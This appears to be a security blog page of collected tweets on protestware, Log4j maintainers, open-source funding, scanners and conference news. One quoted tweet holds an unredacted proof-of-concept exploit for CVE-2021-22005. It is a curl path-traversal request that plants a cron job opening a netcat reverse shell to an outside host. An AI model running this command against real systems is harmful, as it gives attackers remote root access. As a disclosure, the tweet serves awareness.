Hackarandas Blog
@hackarandas
Where ideas are dispersed in bytes... ITSec Blog - owner: @ch0ks
What a time to be alive!
Big Tech engineers, don’t let your skills rot. Make sure you are always trying new technologies, languages and frameworks on your spare time/evenings and write software to unionize your company.
Researchers are tracking a number of open-source code packages on GitHub that are being turned into "protestware," code that displays anti-war messages or casualty stats to users w/ RU or Belarusian IPs. Other protestware wipes files for RU/BY users. krebsonsecurity.com/2022/03/pro-uk…
Don't bash open-source developers and maintainers, please. Bugs happen, and the software is free. Hate the bug, not the dev.
Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people from bashing us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns.
Watching this log4j bug metastasize, I’m seeing people ask why industry doesn’t fund open source. I don’t have a great answer, but I have some thoughts following the experience with Heartbleed in ‘14. 1/
Wanna know if the web app you are building is secure? Here is a tutorial on how to test the security of any web app in 3 min with nuclei, an open-source and developer-friendly app security scanner blog.escape.tech/devsecops-part… (👋 @pdnuclei)
Kubernetes-Goat - Is A "Vulnerable By Design" Kubernetes Cluster. Designed To Be An Intentionally Vulnerable Cluster Environment To Learn And Practice Kubernetes Security kitploit.com/2021/11/kubern…
CVE-2021-22005: Exploitation in the wild confirmed. Unredacted RCE PoC against CEIP below. curl -kv "https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh 172.16.57.1 4444"
Redacted RCE PoC: 1. curl -kv "https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/$RANDOM" -H Content-Type: -d "" 2. curl -kv "https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../[redacted]" -H Content-Type: -d "[redacted]"
Adding more people to a project
Mindmap 🧠 for pass-the-whatever and common attacks operated on Active Directory authentication protocols (NTLM, Kerberos) ➡️ Featured on thehacker.recipes
Can hardly believe it. This is Windows 10 in 2021.
Finally a use for all those remote hacks on Teslas.
Tesla Model Y Police Vehicle Makes World Debut in New York 🚔⚡️🗽 tesmanian.com/blogs/tesmania… $TSLA #Tesla #EV @elonmusk 🎥: @HastingsPD
Sporting this shirt today bc apparently this is the theme of the day at work
We don’t know what to say, other than thank you! We can’t believe this is real, we did it! We want to thank each and every one of you who helped save #Caltrain, we couldn’t have done it without you. This is a historic moment for transit in the Bay Area and it's all thanks to you!
Wow, this is utterly bullshit.
Tesla Model Y Police Vehicle Makes World Debut in New York 🚔⚡️🗽 tesmanian.com/blogs/tesmania… $TSLA #Tesla #EV @elonmusk 🎥: @HastingsPD
Fuck COVID19
#defcon28 has entered Safe Mode. The #DEFCONiscanceled meme has crossed over into real life, courtesy of #COVID19. In early March we had hopes that things would be stable by August. That is no longer realistic.
i heard having no taste is a symptom of COVID-19. i hope everyone that prefers windows is okay! 🖤
Please help these people to recover their channel! Every retweet counts! #anutricionaltvregresa @TeamYouTube @YouTube @anutricional
RT please. Let's help a great Mexican nutritionist recover her channel! #anutricionaltvregresa @TeamYouTube @YouTube